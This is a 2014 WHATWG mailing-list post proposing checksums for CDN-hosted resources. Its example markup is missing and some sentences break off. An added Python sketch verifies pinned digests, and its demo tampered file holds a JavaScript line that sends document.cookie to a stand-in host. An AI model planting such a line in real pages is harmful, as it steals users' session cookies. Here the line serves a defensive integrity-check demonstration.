[whatwg] Checksum for external resources
Eduardo Robles Elvira
edulix at agoravoting.com
Tue Mar 11 07:23:30 PDT 2014
I propose that external resources can be hashed. Before you jump on me,
I know that this has been proposed in the past but I think it's that
time of the year to propose it again.
My concrete use-case is simple: I want to be able to use CDNs for common
administrators. That's why I'd like to be able to do something like this:
That's the only way I'd trust i.e. Google as a CDN, for example. Note,
these are files that should not change.
In a post-Snowden era, I think it's really important to improve the
security of the web. CDNs provide a useful service, but I don't want to
have to trust them. Yes, I want the cake, and eat it too.
Of course, this is just one use-case, there are others. This could be
applied also to <a> and maybe other tags too. And maybe this is not the
best layer to apply the checksum: another way could be to do this in
the URIs themselves, but I think that's more tricky.
But if you think that's the way it should be done, then so be it. The bottom
line for me is: I don't know at what level to apply the fix, but I do
think we need a solution for this. Unless NSA thinks otherwise, of
 something like sha512+https://thehash;path/to/file
Eduardo Robles Elvira, +34 668 824 393, https://agoravoting.com
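
The check proposed in the message above, as an added example that is not part of the original post: the site owner pins a digest of the file they reviewed, and a copy fetched from the CDN is accepted only if it hashes to the same value. The `<alg>-<base64 digest>` string format and the function names are assumptions made for this sketch, not syntax from the proposal.

```python
import base64
import hashlib
import hmac

# Digest algorithms this sketch accepts; anything else is rejected, not ignored.
ALLOWED = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}


def make_checksum(data: bytes, alg: str = "sha512") -> str:
    """Return '<alg>-<base64 digest>' for the bytes the site owner reviewed."""
    if alg not in ALLOWED:
        raise ValueError(f"unsupported algorithm: {alg}")
    digest = ALLOWED[alg](data).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


def verify_resource(data: bytes, declared: str) -> bool:
    """True only if data matches the declared checksum; every other case fails closed."""
    alg, sep, b64 = declared.partition("-")
    if not sep or alg not in ALLOWED:
        return False  # missing separator, or a weak/unknown algorithm such as md5
    try:
        expected = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return False  # malformed digest is a mismatch, not a pass
    actual = ALLOWED[alg](data).digest()
    # Constant-time comparison; a truncated digest has a different length and fails.
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    # Constructed sample: the file as reviewed, and a copy altered by the host.
    reviewed = b"function add(a, b) { return a + b; }\n"
    tampered = reviewed + b"new Image().src = '//collector.example/?c=' + document.cookie;\n"
    pin = make_checksum(reviewed)
    print("pinned checksum:", pin)
    print("reviewed copy accepted:", verify_resource(reviewed, pin))
    print("tampered copy accepted:", verify_resource(tampered, pin))
```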